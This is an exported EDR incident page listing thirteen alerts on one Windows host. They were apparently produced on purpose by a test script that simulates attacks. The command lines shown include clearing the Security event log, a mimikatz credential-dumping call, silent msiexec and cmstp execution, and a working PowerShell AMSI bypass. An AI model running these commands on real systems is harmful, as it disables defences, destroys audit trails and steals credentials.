Back to list

Incident Overview

Incident ID CINC-20251221-DB0A2426
Severity Medium (70)
Status new
Alert Count 13
Host Count 1

Timeline

First Seen 2025-12-22 03:17:25
Last Seen 2025-12-22 03:18:41
Duration 0d 0h 1m
Created 2025-12-22 08:36
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Execution Defense Evasion Credential Access Persistence AI Powered IOA
Techniques:
User Execution Indicator Removal OS Credential Dumping Event Triggered Execution Command and Scripting Interpreter CMSTP PowerShell

Affected Hosts (1)

DESKTOP-FNUMV3U

Related Alerts (13)

Severity Status Hostname Description Tactic Command Line Time
Informational new DESKTOP-FNUMV3U A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 03:18
High new DESKTOP-FNUMV3U A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 03:18
High new DESKTOP-FNUMV3U A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 03:18
High new DESKTOP-FNUMV3U A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-22 03:18
High new DESKTOP-FNUMV3U A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further. Credential Access C:\WINDOWS\system32\cmd.exe /c "powershell sekurlsa::logonpasswords" 12-22 03:18
High new DESKTOP-FNUMV3U Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 03:18
High new DESKTOP-FNUMV3U Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 03:18
High new DESKTOP-FNUMV3U Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-22 03:18
High new DESKTOP-FNUMV3U A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 03:18
High new DESKTOP-FNUMV3U A script meets the cloud-based behavioral machine learning model threshold for suspicious activity. Detection is based on code similarities to known malicious PowerShell scripts. AI Powered IOA powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 03:18
High new DESKTOP-FNUMV3U A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs andor COM scriptlets SCT from remote servers. Review the command line. Defense Evasion cmstp /s /ns C:\Users\User\AppData\Local\Temp\test.inf 12-22 03:18
High new DESKTOP-FNUMV3U A PowerShell script attempted to bypass Microsoft's AntiMalware Scan Interface (AMSI). PowerShell exploit kits often attempt to bypass AMSI to evade detection. Review the script. Execution powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" 12-22 03:18
Informational new DESKTOP-FNUMV3U A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-22 03:17